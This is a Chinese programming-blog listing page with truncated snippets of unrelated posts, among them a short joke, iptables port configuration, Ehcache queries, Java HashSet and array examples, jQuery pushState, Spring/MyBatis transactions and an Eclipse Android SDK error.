    dady, 我今天捡到了十块钱, 不过我还给那个人了 good girl! 那个人有没有和你讲thank you啊 没有啦....他拉我的耳朵我才把钱还给他的, 他哪里会和我讲thank you   爸爸, 如果地上有一张5块一张10块你拿哪一张呢.... 当然是拿十块的咯... 爸爸你很笨的, 你不会两张都拿   爸爸为什么上个月那个人来跟你讨钱, 你告诉他没
  • iptables开放端口 Fanyucai linuxiptables端口
    1,找到配置文件 vi /etc/sysconfig/iptables   2,添加端口开放,增加一行,开放18081端口 -A INPUT -m state --state NEW -m tcp -p tcp --dport 18081 -j ACCEPT   3,保存 ESC :wq!   4,重启服务 service iptables
  • Ehcache(05)——缓存的查询 234390216 排序ehcache统计query
    缓存的查询 目录 1.    使Cache可查询 1.1     基于Xml配置 1.2     基于代码的配置 2     指定可搜索的属性 2.1     可查询属性类型 2.2 &
  • 通过hashset找到数组中重复的元素 jackyrong hashset
      如何在hashset中快速找到重复的元素呢?方法很多,下面是其中一个办法: int[] array = {1,1,2,3,4,5,6,7,8,8}; Set<Integer> set = new HashSet<Integer>(); for(int i = 0
  • 使用ajax和window.history.pushState无刷新改变页面内容和地址栏URL lanrikey history
    后退时关闭当前页面 <script type="text/javascript"> jQuery(document).ready(function ($) {         if (window.history && window.history.pushState) {
  • 应用程序的通信成本 netkiller.github.com 虚拟机应用服务器陈景峰netkillerneo
    应用程序的通信成本 什么是通信 一个程序中两个以上功能相互传递信号或数据叫做通信。 什么是成本 这是是指时间成本与空间成本。 时间就是传递数据所花费的时间。空间是指传递过程耗费容量大小。 都有哪些通信方式 全局变量 线程间通信 共享内存 共享文件 管道 Socket 硬件(串口,USB) 等等 全局变量 全局变量是成本最低通信方法,通过设置
  • 一维数组与二维数组的声明与定义 恋洁e生 二维数组一维数组定义声明初始化
    /**  *  */ package test20111005; /**  * @author FlyingFire  * @date:2011-11-18 上午04:33:36  * @author :代码整理  * @introduce :一维数组与二维数组的初始化  *summary:  */ public c
  • Spring Mybatis独立事务配置 toknowme mybatis
    在项目中有很多地方会使用到独立事务,下面以获取主键为例   (1)修改配置文件spring-mybatis.xml  <!-- 开启事务支持 -->  <tx:annotation-driven transaction-manager="transactionManager" />   &n
  • 更新Anadroid SDK Tooks之后,Eclipse提示No update were found xp9802 eclipse
    使用Android SDK Manager 更新了Anadroid SDK Tooks 之后, 打开eclipse提示 This Android SDK requires Android Developer Toolkit version 23.0.0 or above, 点击Check for Updates  检测一会后提示 No update were found 
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他